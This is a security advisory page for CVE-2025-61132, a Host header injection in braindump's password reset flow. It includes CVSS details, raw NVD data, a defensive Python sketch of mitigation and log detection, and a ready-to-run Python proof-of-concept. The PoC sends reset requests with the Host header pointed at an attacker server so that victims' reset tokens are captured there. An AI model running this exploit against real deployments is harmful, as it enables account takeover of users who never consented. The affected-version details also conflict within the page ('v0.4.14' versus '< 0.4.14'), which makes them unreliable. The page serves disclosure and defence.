Security Vulnerability Report

CVE-2025-61132 CVSS 7.1 HIGH

Published: 2025-10-23 15:15:44
Last Modified: 2026-04-15 00:35:42

Description

A Host Header Injection vulnerability in the password reset component in levlaz braindump v0.4.14 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME.
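As a defender-side illustration of the mechanism described above (added here; this is not code from the braindump project, from the advisory, or from Flask itself), the following stand-alone Python block models how an absolute link inherits its origin from the request's Host header when no fixed server name is configured, puts the hardened behaviour beside it (validate Host against an allow-list, then build the link from a configured SERVER_NAME so the header can no longer influence it), and scans a few constructed reverse-proxy log records for reset requests that carry an untrusted Host. The host names, the TRUSTED_HOSTS allow-list, the JSON log format and the /forgot path are assumptions made for the example.

```python
"""Model of CVE-2025-61132 (password reset poisoning via Host header) and the
corresponding mitigation and detection. Simplified model written for this page;
it does not reproduce Flask/Werkzeug internals or the braindump code."""
import json
from typing import List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Hypothetical deployment values (assumptions for the example, not from the advisory).
TRUSTED_HOSTS: Set[str] = {"braindump.example.org"}
SERVER_NAME = "braindump.example.org"


def external_url(path: str, request_host: str, server_name: Optional[str] = None) -> str:
    """Simplified model of building an absolute URL the way url_for(..., _external=True)
    is asked to: with no fixed server name, the host comes from the incoming request,
    so whoever controls the Host header controls the origin of the emitted link."""
    host = server_name if server_name else request_host
    return f"https://{host}{path}"


def host_is_trusted(host_header: str, trusted: Set[str] = TRUSTED_HOSTS) -> bool:
    """Allow-list check on the Host header. Case is normalised and an explicit port
    is dropped so 'Braindump.example.org:443' still matches; a userinfo-style value
    such as 'trusted@evil' resolves to 'evil' and is therefore rejected."""
    parsed = urlsplit("//" + host_header.strip().lower())
    if not parsed.hostname:
        return False
    return parsed.hostname in trusted


def build_reset_link(token: str, request_host: str, *, hardened: bool) -> Optional[str]:
    """Vulnerable path: the origin of the reset link is taken from the request.
    Hardened path: the request is refused (None, no mail sent) unless Host is on
    the allow-list, and the link is built from SERVER_NAME rather than the header."""
    path = f"/reset/{token}"
    if not hardened:
        return external_url(path, request_host)  # poisonable by the Host header
    if not host_is_trusted(request_host):
        return None
    return external_url(path, request_host, server_name=SERVER_NAME)


# Constructed reverse-proxy access records (sample data, not real logs).
SAMPLE_LOGS = [
    '{"ts":"2025-10-23T15:15:44Z","method":"POST","path":"/forgot",'
    '"host":"braindump.example.org","src":"198.51.100.10"}',
    '{"ts":"2025-10-23T15:16:02Z","method":"POST","path":"/forgot",'
    '"host":"evil.attacker.com","src":"203.0.113.7"}',
    '{"ts":"2025-10-23T15:16:30Z","method":"GET","path":"/",'
    '"host":"braindump.example.org:443","src":"198.51.100.11"}',
]


def suspicious_reset_requests(lines: List[str]) -> List[Tuple[str, str]]:
    """Flag password-reset requests whose Host header is off the allow-list: the
    signature of a poisoning attempt (or of a misconfigured proxy worth fixing)."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        if rec["path"] == "/forgot" and not host_is_trusted(rec["host"]):
            hits.append((rec["src"], rec["host"]))
    return hits


if __name__ == "__main__":
    print("vulnerable:", build_reset_link("tok", "evil.attacker.com", hardened=False))
    print("hardened:  ", build_reset_link("tok", "evil.attacker.com", hardened=True))
    print("flagged:   ", suspicious_reset_requests(SAMPLE_LOGS))
```

The two layers are deliberate: the allow-list stops the request at the edge, while building the link from SERVER_NAME means that even a request that slips past the check (a proxy rewriting Host, a second vhost on the same app) cannot redirect the token. The same check, applied to proxy logs, gives a cheap retrospective search for poisoning attempts against an unpatched deployment.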

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No NVD configuration (CPE) data is available. Affected product as stated in the advisory:

levlaz braindump < 0.4.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-61132 Password Reset Host Header Injection PoC
# Target: levlaz braindump v0.4.14

TARGET_URL = "http://target-server.com"  # Replace with actual target
ATTACKER_HOST = "evil.attacker.com"      # Replace with attacker controlled server


def exploit_host_header_injection():
    """
    Perform Host Header Injection attack for password reset poisoning.

    Steps:
    1. Send password reset request with malicious Host header
    2. Wait for victim to click the crafted reset link
    3. Capture the reset token from the attacker server logs
    4. Use token to reset victim's password
    """
    # Step 1: Request password reset with injected Host header
    reset_endpoint = f"{TARGET_URL}/forgot"
    headers = {
        "Host": ATTACKER_HOST,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }
    data = {
        "email": "[email protected]"  # Target victim's email
    }

    print(f"[*] Sending password reset request to {TARGET_URL}")
    print(f"[*] Injecting Host header: {ATTACKER_HOST}")

    try:
        response = requests.post(reset_endpoint, data=data, headers=headers, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        print(f"[*] Check {ATTACKER_HOST} logs for captured reset tokens")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


def check_vulnerability():
    """
    Check if the target is vulnerable by observing Host header reflection.
    """
    check_endpoint = f"{TARGET_URL}/forgot"
    test_headers = {
        "Host": "test.injection.com",
        "User-Agent": "Vulnerability Scanner",
    }

    response = requests.get(check_endpoint, headers=test_headers, allow_redirects=False, timeout=10)

    # Check if the response contains references to the injected host
    if "test.injection.com" in response.text or "test.injection.com" in str(response.headers):
        print("[!] Target appears to be vulnerable to Host Header Injection")
        return True
    else:
        print("[-] Target does not appear to be vulnerable")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-61132 Host Header Injection PoC")
    print("Target: levlaz braindump v0.4.14")
    print("=" * 60)

    # First check if vulnerable
    is_vulnerable = check_vulnerability()

    if is_vulnerable:
        print("\n[*] Proceeding with exploitation...")
        exploit_host_header_injection()
```

References

- https://drive.google.com/file/d/1FmkctLdOTGMdy6GgLaTzfxemdVDeiA7J/view?usp=sharing
- https://gist.github.com/BrookeYangRui/94c3bee0c2cbc1ed81a21d4448550c21
- https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/auth/views.py#L131-L148
- https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/templates/auth/email/reset_password.html#L1-L8
- https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61132",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-23T15:15:44.080",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Host Header Injection vulnerability in the password reset component in levlaz braindump v0.4.14 allows remote attackers to conduct password reset poisoning and account takeover via manipulation of the Host header when Flask's url_for(_external=True) generates reset links without a fixed SERVER_NAME."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-620"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://drive.google.com/file/d/1FmkctLdOTGMdy6GgLaTzfxemdVDeiA7J/view?usp=sharing",
        "source": "[email protected]"
      },
      {
        "url": "https://gist.github.com/BrookeYangRui/94c3bee0c2cbc1ed81a21d4448550c21",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/auth/views.py#L131-L148",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/levlaz/braindump/blob/9640dd03f99851dbd34dd6cac98a747a4a591b01/app/templates/auth/email/reset_password.html#L1-L8",
        "source": "[email protected]"
      },
      {
        "url": "https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning",
        "source": "[email protected]"
      }
    ]
  }
}
```